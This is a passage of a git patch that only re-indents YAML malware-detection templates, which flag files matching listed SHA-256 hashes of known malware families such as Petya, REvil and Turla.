'9c0a33a5dc62933f17506f20e0258f877947bdcd15b091a597eac05d299b7471'" + - "sha256(raw) == 'a787c0e42608f9a69f718f6dca5556607be45ec77d17b07eb9ea1e0f7bb2e064'" + - "sha256(raw) == '3772d473a2fe950959e1fd56c9a44ec48928f92522246f75f4b8cb134f4713ff'" + - "sha256(raw) == '3986d54b00647b507b2afd708b7a1ce4c37027fb77d67c6bc3c20c3ac1a88ca4'" + - "sha256(raw) == 'f5a64de9087b138608ccf036b067d91a47302259269fb05b3349964ca4060e7e'" + condition: or diff --git a/file/malware/hash/passcv-ntscan-malware-hash.yaml b/file/malware/hash/passcv-ntscan-malware-hash.yaml index 9fbb090bde..424537662c 100644 --- a/file/malware/hash/passcv-ntscan-malware-hash.yaml +++ b/file/malware/hash/passcv-ntscan-malware-hash.yaml @@ -13,7 +13,7 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == '0f290612b26349a551a148304a0bd3b0d0651e9563425d7c362f30bd492d8665'" + matchers: + - type: dsl + dsl: + - "sha256(raw) == '0f290612b26349a551a148304a0bd3b0d0651e9563425d7c362f30bd492d8665'" \ No newline at end of file diff --git a/file/malware/hash/passcv-sabre-malware-hash.yaml b/file/malware/hash/passcv-sabre-malware-hash.yaml index 9a3a004ed8..5fddb23e59 100644 --- a/file/malware/hash/passcv-sabre-malware-hash.yaml +++ b/file/malware/hash/passcv-sabre-malware-hash.yaml @@ -14,16 +14,16 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == '24a9bfbff81615a42e42755711c8d04f359f3bf815fb338022edca860ff1908a'" - - "sha256(raw) == 'e61e56b8f2666b9e605127b4fcc7dc23871c1ae25aa0a4ea23b48c9de35d5f55'" - - "sha256(raw) == '475d1c2d36b2cf28b28b202ada78168e7482a98b42ff980bbb2f65c6483db5b4'" - - "sha256(raw) == '009645c628e719fad2e280ef60bbd8e49bf057196ac09b3f70065f1ad2df9b78'" - - "sha256(raw) == '92479c7503393fc4b8dd7c5cd1d3479a182abca3cda21943279c68a8eef9c64b'" - - "sha256(raw) == '0c7b952c64db7add5b8b50b1199fc7d82e9b6ac07193d9ec30e5b8d353b1f6d2'" - - "sha256(raw) == '28c7575b2368a9b58d0d1bf22257c4811bd3c212bd606afc7e65904041c29ce1'" - - "sha256(raw) == '27463bcb4301f0fdd95bc10bf67f9049e161a4e51425dac87949387c54c9167f'" - - "sha256(raw) == '03aafc5f468a84f7dd7d7d38f91ff17ef1ca044e5f5e8bbdfe589f5509b46ae5'" - condition: or + matchers: + - type: dsl + dsl: + - "sha256(raw) == '24a9bfbff81615a42e42755711c8d04f359f3bf815fb338022edca860ff1908a'" + - "sha256(raw) == 'e61e56b8f2666b9e605127b4fcc7dc23871c1ae25aa0a4ea23b48c9de35d5f55'" + - "sha256(raw) == '475d1c2d36b2cf28b28b202ada78168e7482a98b42ff980bbb2f65c6483db5b4'" + - "sha256(raw) == '009645c628e719fad2e280ef60bbd8e49bf057196ac09b3f70065f1ad2df9b78'" + - "sha256(raw) == '92479c7503393fc4b8dd7c5cd1d3479a182abca3cda21943279c68a8eef9c64b'" + - "sha256(raw) == '0c7b952c64db7add5b8b50b1199fc7d82e9b6ac07193d9ec30e5b8d353b1f6d2'" + - "sha256(raw) == '28c7575b2368a9b58d0d1bf22257c4811bd3c212bd606afc7e65904041c29ce1'" + - "sha256(raw) == '27463bcb4301f0fdd95bc10bf67f9049e161a4e51425dac87949387c54c9167f'" + - "sha256(raw) == '03aafc5f468a84f7dd7d7d38f91ff17ef1ca044e5f5e8bbdfe589f5509b46ae5'" + condition: or diff --git a/file/malware/hash/passcv-signingcert-malware-hash.yaml b/file/malware/hash/passcv-signingcert-malware-hash.yaml index 29dd4de59e..0557ab8fe3 100644 --- a/file/malware/hash/passcv-signingcert-malware-hash.yaml +++ b/file/malware/hash/passcv-signingcert-malware-hash.yaml @@ -14,7 +14,7 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == '7c32885c258a6d5be37ebe83643f00165da3ebf963471503909781540204752e'" \ No newline at end of file + matchers: + - type: dsl + dsl: + - "sha256(raw) == '7c32885c258a6d5be37ebe83643f00165da3ebf963471503909781540204752e'" \ No newline at end of file diff --git a/file/malware/hash/petya-ransomware-hash.yaml b/file/malware/hash/petya-ransomware-hash.yaml index c365c43943..6ffd292b58 100644 --- a/file/malware/hash/petya-ransomware-hash.yaml +++ b/file/malware/hash/petya-ransomware-hash.yaml @@ -13,7 +13,7 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == '26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739'" + matchers: + - type: dsl + dsl: + - "sha256(raw) == '26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739'" diff --git a/file/malware/hash/poseidongroup-maldoc-malware-hash.yaml b/file/malware/hash/poseidongroup-maldoc-malware-hash.yaml index 218921c76b..237d217ba2 100644 --- a/file/malware/hash/poseidongroup-maldoc-malware-hash.yaml +++ b/file/malware/hash/poseidongroup-maldoc-malware-hash.yaml @@ -14,14 +14,14 @@ file: - doc - docx - matchers: - - type: dsl - dsl: - - "sha256(raw) == '3e4cacab0ff950da1c6a1c640fe6cf5555b99e36d4e1cf5c45f04a2048f7620c'" - - "sha256(raw) == '1f77475d7740eb0c5802746d63e93218f16a7a19f616e8fddcbff07983b851af'" - - "sha256(raw) == 'f028ee20363d3a17d30175508bbc4738dd8e245a94bfb200219a40464dd09b3a'" - - "sha256(raw) == 'ec309300c950936a1b9f900aa30630b33723c42240ca4db978f2ca5e0f97afed'" - - "sha256(raw) == '27449198542fed64c23f583617908c8648fa4b4633bacd224f97e7f5d8b18778'" - - "sha256(raw) == '1e62629dae05bf7ee3fe1346faa60e6791c61f92dd921daa5ce2bdce2e9d4216'" - - "sha256(raw) == '0983526d7f0640e5765ded6be6c9e64869172a02c20023f8a006396ff358999b'" - condition: or + matchers: + - type: dsl + dsl: + - "sha256(raw) == '3e4cacab0ff950da1c6a1c640fe6cf5555b99e36d4e1cf5c45f04a2048f7620c'" + - "sha256(raw) == '1f77475d7740eb0c5802746d63e93218f16a7a19f616e8fddcbff07983b851af'" + - "sha256(raw) == 'f028ee20363d3a17d30175508bbc4738dd8e245a94bfb200219a40464dd09b3a'" + - "sha256(raw) == 'ec309300c950936a1b9f900aa30630b33723c42240ca4db978f2ca5e0f97afed'" + - "sha256(raw) == '27449198542fed64c23f583617908c8648fa4b4633bacd224f97e7f5d8b18778'" + - "sha256(raw) == '1e62629dae05bf7ee3fe1346faa60e6791c61f92dd921daa5ce2bdce2e9d4216'" + - "sha256(raw) == '0983526d7f0640e5765ded6be6c9e64869172a02c20023f8a006396ff358999b'" + condition: or diff --git a/file/malware/hash/poseidongroup-malware-hash.yaml b/file/malware/hash/poseidongroup-malware-hash.yaml index c35c402241..9db84bd8ec 100644 --- a/file/malware/hash/poseidongroup-malware-hash.yaml +++ b/file/malware/hash/poseidongroup-malware-hash.yaml @@ -13,14 +13,14 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == '337e94119cfad0b3144af81b72ac3b2688a219ffa0bdf23ca56c7a68fbe0aea4'" - - "sha256(raw) == '344034c0bf9fcd52883dbc158abf6db687150d40a118d9cd6ebd843e186128d3'" - - "sha256(raw) == '432b7f7f7bf94260a58ad720f61d91ba3289bf0a9789fc0c2b7ca900788dae61'" - - "sha256(raw) == '8955df76182005a69f19f5421c355f1868efe65d6b9e0145625dceda94b84a47'" - - "sha256(raw) == 'd090b1d77e91848b1e2f5690b54360bbbd7ef808d017304389b90a0f8423367f'" - - "sha256(raw) == 'd7c8b47a0d0a9181fb993f17e165d75a6be8cf11812d3baf7cf11d085e21d4fb'" - - "sha256(raw) == 'ded0ee29af97496f27d810f6c16d78a3031d8c2193d5d2a87355f3e3ca58f9b3'" - condition: or + matchers: + - type: dsl + dsl: + - "sha256(raw) == '337e94119cfad0b3144af81b72ac3b2688a219ffa0bdf23ca56c7a68fbe0aea4'" + - "sha256(raw) == '344034c0bf9fcd52883dbc158abf6db687150d40a118d9cd6ebd843e186128d3'" + - "sha256(raw) == '432b7f7f7bf94260a58ad720f61d91ba3289bf0a9789fc0c2b7ca900788dae61'" + - "sha256(raw) == '8955df76182005a69f19f5421c355f1868efe65d6b9e0145625dceda94b84a47'" + - "sha256(raw) == 'd090b1d77e91848b1e2f5690b54360bbbd7ef808d017304389b90a0f8423367f'" + - "sha256(raw) == 'd7c8b47a0d0a9181fb993f17e165d75a6be8cf11812d3baf7cf11d085e21d4fb'" + - "sha256(raw) == 'ded0ee29af97496f27d810f6c16d78a3031d8c2193d5d2a87355f3e3ca58f9b3'" + condition: or diff --git a/file/malware/hash/purplewave-malware-hash.yaml b/file/malware/hash/purplewave-malware-hash.yaml index 6ee8e00cd5..f9bbc2d775 100644 --- a/file/malware/hash/purplewave-malware-hash.yaml +++ b/file/malware/hash/purplewave-malware-hash.yaml @@ -12,16 +12,16 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == '7de7b866c46f34be28f7085fb1a1727ab939d65abd3128871fb68c42371af2df'" - - "sha256(raw) == '76bffcf04104a1c4e6a5792d3795d1a03c7497a274042889b8f44c8f8facc304'" - - "sha256(raw) == '832d667b00c07424f050f84e717f8db22833b1e8e131aa7a33de739c4f4b4cdd'" - - "sha256(raw) == '917057a6a03252bc2525b326a63111fce050fc86e6e3b26fa9e452489f1358b9'" - - "sha256(raw) == 'a8577e1ccad877ae5ff4bf89aa578989404643c6fdf10baafd4335a1766abb16'" - - "sha256(raw) == 'd5ec98c98a8f56fdeb00cc2404c4527a39726bf43d8b9cf6c4c8c36364f94161'" - - "sha256(raw) == 'd820ec7f9196a5cc3dbc2b5860334a2e174fede80efc3b8463756fb8767dddf9'" - - "sha256(raw) == 'd4572e26b9e6ce963af590979afe3df6e1be78aa8ec0e926e77b0affb7ab1554'" - - "sha256(raw) == '4b3cb90581dcd77c9ceffbd662b8dac70b68de5a03cd56940434cc035209d61d'" - condition: or + matchers: + - type: dsl + dsl: + - "sha256(raw) == '7de7b866c46f34be28f7085fb1a1727ab939d65abd3128871fb68c42371af2df'" + - "sha256(raw) == '76bffcf04104a1c4e6a5792d3795d1a03c7497a274042889b8f44c8f8facc304'" + - "sha256(raw) == '832d667b00c07424f050f84e717f8db22833b1e8e131aa7a33de739c4f4b4cdd'" + - "sha256(raw) == '917057a6a03252bc2525b326a63111fce050fc86e6e3b26fa9e452489f1358b9'" + - "sha256(raw) == 'a8577e1ccad877ae5ff4bf89aa578989404643c6fdf10baafd4335a1766abb16'" + - "sha256(raw) == 'd5ec98c98a8f56fdeb00cc2404c4527a39726bf43d8b9cf6c4c8c36364f94161'" + - "sha256(raw) == 'd820ec7f9196a5cc3dbc2b5860334a2e174fede80efc3b8463756fb8767dddf9'" + - "sha256(raw) == 'd4572e26b9e6ce963af590979afe3df6e1be78aa8ec0e926e77b0affb7ab1554'" + - "sha256(raw) == '4b3cb90581dcd77c9ceffbd662b8dac70b68de5a03cd56940434cc035209d61d'" + condition: or diff --git a/file/malware/hash/red-leaves-malware-hash.yaml b/file/malware/hash/red-leaves-malware-hash.yaml index 6a5eef6859..56146d3ac9 100644 --- a/file/malware/hash/red-leaves-malware-hash.yaml +++ b/file/malware/hash/red-leaves-malware-hash.yaml @@ -14,7 +14,7 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == '2e1f902de32b999642bb09e995082c37a024f320c683848edadaf2db8e322c3c'" \ No newline at end of file + matchers: + - type: dsl + dsl: + - "sha256(raw) == '2e1f902de32b999642bb09e995082c37a024f320c683848edadaf2db8e322c3c'" \ No newline at end of file diff --git a/file/malware/hash/revil-ransomware-hash.yaml b/file/malware/hash/revil-ransomware-hash.yaml index 2e441956a5..bbeb49e3a9 100644 --- a/file/malware/hash/revil-ransomware-hash.yaml +++ b/file/malware/hash/revil-ransomware-hash.yaml @@ -14,10 +14,10 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == 'f864922f947a6bb7d894245b53795b54b9378c0f7633c521240488e86f60c2c5'" - - "sha256(raw) == '559e9c0a2ef6898fabaf0a5fb10ac4a0f8d721edde4758351910200fe16b5fa7'" - - "sha256(raw) == 'ea1872b2835128e3cb49a0bc27e4727ca33c4e6eba1e80422db19b505f965bc4'" - condition: or + matchers: + - type: dsl + dsl: + - "sha256(raw) == 'f864922f947a6bb7d894245b53795b54b9378c0f7633c521240488e86f60c2c5'" + - "sha256(raw) == '559e9c0a2ef6898fabaf0a5fb10ac4a0f8d721edde4758351910200fe16b5fa7'" + - "sha256(raw) == 'ea1872b2835128e3cb49a0bc27e4727ca33c4e6eba1e80422db19b505f965bc4'" + condition: or diff --git a/file/malware/hash/rokrat-malware-hash.yaml b/file/malware/hash/rokrat-malware-hash.yaml index f28b8b56a2..fc25dcc792 100644 --- a/file/malware/hash/rokrat-malware-hash.yaml +++ b/file/malware/hash/rokrat-malware-hash.yaml @@ -14,7 +14,7 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == 'e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd'" \ No newline at end of file + matchers: + - type: dsl + dsl: + - "sha256(raw) == 'e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd'" \ No newline at end of file diff --git a/file/malware/hash/sauron-malware-hash.yaml b/file/malware/hash/sauron-malware-hash.yaml index 5f5b46eeb3..00d6694701 100644 --- a/file/malware/hash/sauron-malware-hash.yaml +++ b/file/malware/hash/sauron-malware-hash.yaml @@ -13,14 +13,14 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == '9572624b6026311a0e122835bcd7200eca396802000d0777dba118afaaf9f2a9'" - - "sha256(raw) == '30a824155603c2e9d8bfd3adab8660e826d7e0681e28e46d102706a03e23e3a8'" - - "sha256(raw) == 'a4736de88e9208eb81b52f29bab9e7f328b90a86512bd0baadf4c519e948e5ec'" - - "sha256(raw) == 'e12e66a6127cfd2cbb42e6f0d57c9dd019b02768d6f1fb44d91f12d90a611a57'" - - "sha256(raw) == '3782b63d7f6f688a5ccb1b72be89a6a98bb722218c9f22402709af97a41973c8'" - - "sha256(raw) == '7cc0bf547e78c8aaf408495ceef58fa706e6b5d44441fefdce09d9f06398c0ca'" - - "sha256(raw) == '6c8c93069831a1b60279d2b316fd36bffa0d4c407068dbef81b8e2fe8fd8e8cd'" - condition: or + matchers: + - type: dsl + dsl: + - "sha256(raw) == '9572624b6026311a0e122835bcd7200eca396802000d0777dba118afaaf9f2a9'" + - "sha256(raw) == '30a824155603c2e9d8bfd3adab8660e826d7e0681e28e46d102706a03e23e3a8'" + - "sha256(raw) == 'a4736de88e9208eb81b52f29bab9e7f328b90a86512bd0baadf4c519e948e5ec'" + - "sha256(raw) == 'e12e66a6127cfd2cbb42e6f0d57c9dd019b02768d6f1fb44d91f12d90a611a57'" + - "sha256(raw) == '3782b63d7f6f688a5ccb1b72be89a6a98bb722218c9f22402709af97a41973c8'" + - "sha256(raw) == '7cc0bf547e78c8aaf408495ceef58fa706e6b5d44441fefdce09d9f06398c0ca'" + - "sha256(raw) == '6c8c93069831a1b60279d2b316fd36bffa0d4c407068dbef81b8e2fe8fd8e8cd'" + condition: or diff --git a/file/malware/hash/seaduke-malware-hash.yaml b/file/malware/hash/seaduke-malware-hash.yaml index 4b7f2f119e..ea230ee435 100644 --- a/file/malware/hash/seaduke-malware-hash.yaml +++ b/file/malware/hash/seaduke-malware-hash.yaml @@ -12,7 +12,7 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == 'd2e570129a12a47231a1ecb8176fa88a1bf415c51dabd885c513d98b15f75d4e'" \ No newline at end of file + matchers: + - type: dsl + dsl: + - "sha256(raw) == 'd2e570129a12a47231a1ecb8176fa88a1bf415c51dabd885c513d98b15f75d4e'" \ No newline at end of file diff --git a/file/malware/hash/sfx1-malware-hash.yaml b/file/malware/hash/sfx1-malware-hash.yaml index c763fff943..2644b8af66 100644 --- a/file/malware/hash/sfx1-malware-hash.yaml +++ b/file/malware/hash/sfx1-malware-hash.yaml @@ -13,9 +13,9 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == 'c0675b84f5960e95962d299d4c41511bbf6f8f5f5585bdacd1ae567e904cb92f'" - - "sha256(raw) == '502e42dc99873c52c3ca11dd3df25aad40d2b083069e8c22dd45da887f81d14d'" - condition: or + matchers: + - type: dsl + dsl: + - "sha256(raw) == 'c0675b84f5960e95962d299d4c41511bbf6f8f5f5585bdacd1ae567e904cb92f'" + - "sha256(raw) == '502e42dc99873c52c3ca11dd3df25aad40d2b083069e8c22dd45da887f81d14d'" + condition: or diff --git a/file/malware/hash/sfxrar-acrotray-malware-hash.yaml b/file/malware/hash/sfxrar-acrotray-malware-hash.yaml index c0d5f62dd4..4d81949cbe 100644 --- a/file/malware/hash/sfxrar-acrotray-malware-hash.yaml +++ b/file/malware/hash/sfxrar-acrotray-malware-hash.yaml @@ -12,10 +12,10 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == '51e713c7247f978f5836133dd0b8f9fb229e6594763adda59951556e1df5ee57'" - - "sha256(raw) == '5d695ff02202808805da942e484caa7c1dc68e6d9c3d77dc383cfa0617e61e48'" - - "sha256(raw) == '56531cc133e7a760b238aadc5b7a622cd11c835a3e6b78079d825d417fb02198'" - condition: or \ No newline at end of file + matchers: + - type: dsl + dsl: + - "sha256(raw) == '51e713c7247f978f5836133dd0b8f9fb229e6594763adda59951556e1df5ee57'" + - "sha256(raw) == '5d695ff02202808805da942e484caa7c1dc68e6d9c3d77dc383cfa0617e61e48'" + - "sha256(raw) == '56531cc133e7a760b238aadc5b7a622cd11c835a3e6b78079d825d417fb02198'" + condition: or \ No newline at end of file diff --git a/file/malware/hash/sofacy-Winexe-malware-hash.yaml b/file/malware/hash/sofacy-Winexe-malware-hash.yaml index 0306f2f9de..db4db62626 100644 --- a/file/malware/hash/sofacy-Winexe-malware-hash.yaml +++ b/file/malware/hash/sofacy-Winexe-malware-hash.yaml @@ -14,7 +14,7 @@ file: - extensions: - exe - matchers: - - type: dsl - dsl: - - "sha256(raw) == '5130f600cd9a9cdc82d4bad938b20cbd2f699aadb76e7f3f1a93602330d9997d'" + matchers: + - type: dsl + dsl: + - "sha256(raw) == '5130f600cd9a9cdc82d4bad938b20cbd2f699aadb76e7f3f1a93602330d9997d'" diff --git a/file/malware/hash/sofacy-bundestag-malware-hash.yaml b/file/malware/hash/sofacy-bundestag-malware-hash.yaml index 40d4c6ae20..30a09f0a27 100644 --- a/file/malware/hash/sofacy-bundestag-malware-hash.yaml +++ b/file/malware/hash/sofacy-bundestag-malware-hash.yaml @@ -14,9 +14,9 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == '566ab945f61be016bfd9e83cc1b64f783b9b8deb891e6d504d3442bc8281b092'" - - "sha256(raw) == '5f6b2a0d1d966fc4f1ed292b46240767f4acb06c13512b0061b434ae2a692fa1'" - condition: or + matchers: + - type: dsl + dsl: + - "sha256(raw) == '566ab945f61be016bfd9e83cc1b64f783b9b8deb891e6d504d3442bc8281b092'" + - "sha256(raw) == '5f6b2a0d1d966fc4f1ed292b46240767f4acb06c13512b0061b434ae2a692fa1'" + condition: or diff --git a/file/malware/hash/sofacy-fybis-malware-hash.yaml b/file/malware/hash/sofacy-fybis-malware-hash.yaml index bce5e40be5..16b7ef433c 100644 --- a/file/malware/hash/sofacy-fybis-malware-hash.yaml +++ b/file/malware/hash/sofacy-fybis-malware-hash.yaml @@ -12,10 +12,10 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == '02c7cf55fd5c5809ce2dce56085ba43795f2480423a4256537bfdfda0df85592'" - - "sha256(raw) == '8bca0031f3b691421cb15f9c6e71ce193355d2d8cf2b190438b6962761d0c6bb'" - - "sha256(raw) == 'fd8b2ea9a2e8a67e4cb3904b49c789d57ed9b1ce5bebfe54fe3d98214d6a0f61'" - condition: or + matchers: + - type: dsl + dsl: + - "sha256(raw) == '02c7cf55fd5c5809ce2dce56085ba43795f2480423a4256537bfdfda0df85592'" + - "sha256(raw) == '8bca0031f3b691421cb15f9c6e71ce193355d2d8cf2b190438b6962761d0c6bb'" + - "sha256(raw) == 'fd8b2ea9a2e8a67e4cb3904b49c789d57ed9b1ce5bebfe54fe3d98214d6a0f61'" + condition: or diff --git a/file/malware/hash/tidepool-malware-hash.yaml b/file/malware/hash/tidepool-malware-hash.yaml index 8cf1c20e7f..ca7773b2b2 100644 --- a/file/malware/hash/tidepool-malware-hash.yaml +++ b/file/malware/hash/tidepool-malware-hash.yaml @@ -14,11 +14,11 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == '9d0a47bdf00f7bd332ddd4cf8d95dd11ebbb945dda3d72aac512512b48ad93ba'" - - "sha256(raw) == '67c4e8ab0f12fae7b4aeb66f7e59e286bd98d3a77e5a291e8d58b3cfbc1514ed'" - - "sha256(raw) == '2252dcd1b6afacde3f94d9557811bb769c4f0af3cb7a48ffe068d31bb7c30e18'" - - "sha256(raw) == '38f2c86041e0446730479cdb9c530298c0c4936722975c4e7446544fd6dcac9f'" - condition: or + matchers: + - type: dsl + dsl: + - "sha256(raw) == '9d0a47bdf00f7bd332ddd4cf8d95dd11ebbb945dda3d72aac512512b48ad93ba'" + - "sha256(raw) == '67c4e8ab0f12fae7b4aeb66f7e59e286bd98d3a77e5a291e8d58b3cfbc1514ed'" + - "sha256(raw) == '2252dcd1b6afacde3f94d9557811bb769c4f0af3cb7a48ffe068d31bb7c30e18'" + - "sha256(raw) == '38f2c86041e0446730479cdb9c530298c0c4936722975c4e7446544fd6dcac9f'" + condition: or diff --git a/file/malware/hash/turla-malware-hash.yaml b/file/malware/hash/turla-malware-hash.yaml index 831b2188c4..4ec1736272 100644 --- a/file/malware/hash/turla-malware-hash.yaml +++ b/file/malware/hash/turla-malware-hash.yaml @@ -13,17 +13,17 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == '0e1bf347c37fb199886f1e675e372ba55ac4627e8be2f05a76c2c64f9b6ed0e4'" - - "sha256(raw) == '7206075cd8f1004e8f1f759d46e98bfad4098b8642412811a214c0155a1f08b9'" - - "sha256(raw) == 'fe3ffd7438c0d38484bf02a78a19ea81a6f51b4b3f2b2228bd21974c2538bbcd'" - - "sha256(raw) == 'c49111af049dd9746c6b1980db6e150b2a79ca1569b23ed2cba81c85c00d82b4'" - - "sha256(raw) == 'b62a643c96e2e41f639d2a8ce11d61e6b9d7fb3a9baf011120b7fec1b4ee3cf4'" - - "sha256(raw) == 'edb12790b5cd959bc2e53a4b369a4fd747153e6c9d50f6a69ff047f7857a4348'" - - "sha256(raw) == '8f2ea0f916fda1dfb771f5441e919c561da5b6334b9f2fffcbf53db14063b24a'" - - "sha256(raw) == '8dddc744bbfcf215346c812aa569e49523996f73a1f22fe4e688084ce1225b98'" - - "sha256(raw) == '0c69258adcc97632b729e55664c22cd942812336d41e8ea0cff9ddcafaded20f'" - - "sha256(raw) == '2b4fba1ef06f85d1395945db40a9f2c3b3ed81b56fb9c2d5e5bb693c230215e2'" - condition: or \ No newline at end of file + matchers: + - type: dsl + dsl: + - "sha256(raw) == '0e1bf347c37fb199886f1e675e372ba55ac4627e8be2f05a76c2c64f9b6ed0e4'" + - "sha256(raw) == '7206075cd8f1004e8f1f759d46e98bfad4098b8642412811a214c0155a1f08b9'" + - "sha256(raw) == 'fe3ffd7438c0d38484bf02a78a19ea81a6f51b4b3f2b2228bd21974c2538bbcd'" + - "sha256(raw) == 'c49111af049dd9746c6b1980db6e150b2a79ca1569b23ed2cba81c85c00d82b4'" + - "sha256(raw) == 'b62a643c96e2e41f639d2a8ce11d61e6b9d7fb3a9baf011120b7fec1b4ee3cf4'" + - "sha256(raw) == 'edb12790b5cd959bc2e53a4b369a4fd747153e6c9d50f6a69ff047f7857a4348'" + - "sha256(raw) == '8f2ea0f916fda1dfb771f5441e919c561da5b6334b9f2fffcbf53db14063b24a'" + - "sha256(raw) == '8dddc744bbfcf215346c812aa569e49523996f73a1f22fe4e688084ce1225b98'" + - "sha256(raw) == '0c69258adcc97632b729e55664c22cd942812336d41e8ea0cff9ddcafaded20f'" + - "sha256(raw) == '2b4fba1ef06f85d1395945db40a9f2c3b3ed81b56fb9c2d5e5bb693c230215e2'" + condition: or \ No newline at end of file diff --git a/file/malware/hash/unit78020-malware-hash.yaml b/file/malware/hash/unit78020-malware-hash.yaml index a380d5a7d9..2eca3c4596 100644 --- a/file/malware/hash/unit78020-malware-hash.yaml +++ b/file/malware/hash/unit78020-malware-hash.yaml @@ -14,13 +14,13 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == '2b15e614fb54bca7031f64ab6caa1f77b4c07dac186826a6cd2e254090675d72'" - - "sha256(raw) == '76c586e89c30a97e583c40ebe3f4ba75d5e02e52959184c4ce0a46b3aac54edd'" - - "sha256(raw) == '2625a0d91d3cdbbc7c4a450c91e028e3609ff96c4f2a5a310ae20f73e1bc32ac'" - - "sha256(raw) == '5c62b1d16e6180f22a0cb59c99a7743f44cb4a41e4e090b9733d1fb687c8efa2'" - - "sha256(raw) == '7b73bf2d80a03eb477242967628da79924fbe06cc67c4dcdd2bdefccd6e0e1af'" - - "sha256(raw) == '88c5be84afe20c91e4024160303bafb044f98aa5fbf8c9f9997758a014238790'" - condition: or + matchers: + - type: dsl + dsl: + - "sha256(raw) == '2b15e614fb54bca7031f64ab6caa1f77b4c07dac186826a6cd2e254090675d72'" + - "sha256(raw) == '76c586e89c30a97e583c40ebe3f4ba75d5e02e52959184c4ce0a46b3aac54edd'" + - "sha256(raw) == '2625a0d91d3cdbbc7c4a450c91e028e3609ff96c4f2a5a310ae20f73e1bc32ac'" + - "sha256(raw) == '5c62b1d16e6180f22a0cb59c99a7743f44cb4a41e4e090b9733d1fb687c8efa2'" + - "sha256(raw) == '7b73bf2d80a03eb477242967628da79924fbe06cc67c4dcdd2bdefccd6e0e1af'" + - "sha256(raw) == '88c5be84afe20c91e4024160303bafb044f98aa5fbf8c9f9997758a014238790'" + condition: or diff --git a/file/malware/hash/wildneutron-malware-hash.yaml b/file/malware/hash/wildneutron-malware-hash.yaml index ef44dc7f11..3fa705a81e 100644 --- a/file/malware/hash/wildneutron-malware-hash.yaml +++ b/file/malware/hash/wildneutron-malware-hash.yaml @@ -14,18 +14,18 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == '2b5065a3d0e0b8252a987ef5f29d9e1935c5863f5718b83440e68dc53c21fa94'" - - "sha256(raw) == 'c2c761cde3175f6e40ed934f2e82c76602c81e2128187bab61793ddb3bc686d0'" - - "sha256(raw) == 'b4005530193bc523d3e0193c3c53e2737ae3bf9f76d12c827c0b5cd0dcbaae45'" - - "sha256(raw) == '1604e36ccef5fa221b101d7f043ad7f856b84bf1a80774aa33d91c2a9a226206'" - - "sha256(raw) == '4bd548fe07b19178281edb1ee81c9711525dab03dc0b6676963019c44cc75865'" - - "sha256(raw) == 'a14d31eb965ea8a37ebcc3b5635099f2ca08365646437c770212d534d504ff3c'" - - "sha256(raw) == '758e6b519f6c0931ff93542b767524fc1eab589feb5cfc3854c77842f9785c92'" - - "sha256(raw) == '781eb1e17349009fbae46aea5c59d8e5b68ae0b42335cb035742f6b0f4e4087e'" - - "sha256(raw) == '683f5b476f8ffe87ec22b8bab57f74da4a13ecc3a5c2cbf951999953c2064fc9'" - - "sha256(raw) == '758e6b519f6c0931ff93542b767524fc1eab589feb5cfc3854c77842f9785c92'" - - "sha256(raw) == '8ca7ed720babb32a6f381769ea00e16082a563704f8b672cb21cf11843f4da7a'" - condition: or \ No newline at end of file + matchers: + - type: dsl + dsl: + - "sha256(raw) == '2b5065a3d0e0b8252a987ef5f29d9e1935c5863f5718b83440e68dc53c21fa94'" + - "sha256(raw) == 'c2c761cde3175f6e40ed934f2e82c76602c81e2128187bab61793ddb3bc686d0'" + - "sha256(raw) == 'b4005530193bc523d3e0193c3c53e2737ae3bf9f76d12c827c0b5cd0dcbaae45'" + - "sha256(raw) == '1604e36ccef5fa221b101d7f043ad7f856b84bf1a80774aa33d91c2a9a226206'" + - "sha256(raw) == '4bd548fe07b19178281edb1ee81c9711525dab03dc0b6676963019c44cc75865'" + - "sha256(raw) == 'a14d31eb965ea8a37ebcc3b5635099f2ca08365646437c770212d534d504ff3c'" + - "sha256(raw) == '758e6b519f6c0931ff93542b767524fc1eab589feb5cfc3854c77842f9785c92'" + - "sha256(raw) == '781eb1e17349009fbae46aea5c59d8e5b68ae0b42335cb035742f6b0f4e4087e'" + - "sha256(raw) == '683f5b476f8ffe87ec22b8bab57f74da4a13ecc3a5c2cbf951999953c2064fc9'" + - "sha256(raw) == '758e6b519f6c0931ff93542b767524fc1eab589feb5cfc3854c77842f9785c92'" + - "sha256(raw) == '8ca7ed720babb32a6f381769ea00e16082a563704f8b672cb21cf11843f4da7a'" + condition: or \ No newline at end of file From 8bdeeef48e09831c36695f53c35c81e2d56bb4a8 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 20 Jun 2024 18:52:40 +0530 Subject: [PATCH 0468/1841] indent -fix --- file/malware/hash/codoso-pgv-malware-hash.yaml | 2 +- file/malware/hash/petya-ransomware-hash.yaml | 2 +- file/malware/hash/rokrat-malware-hash.yaml | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git 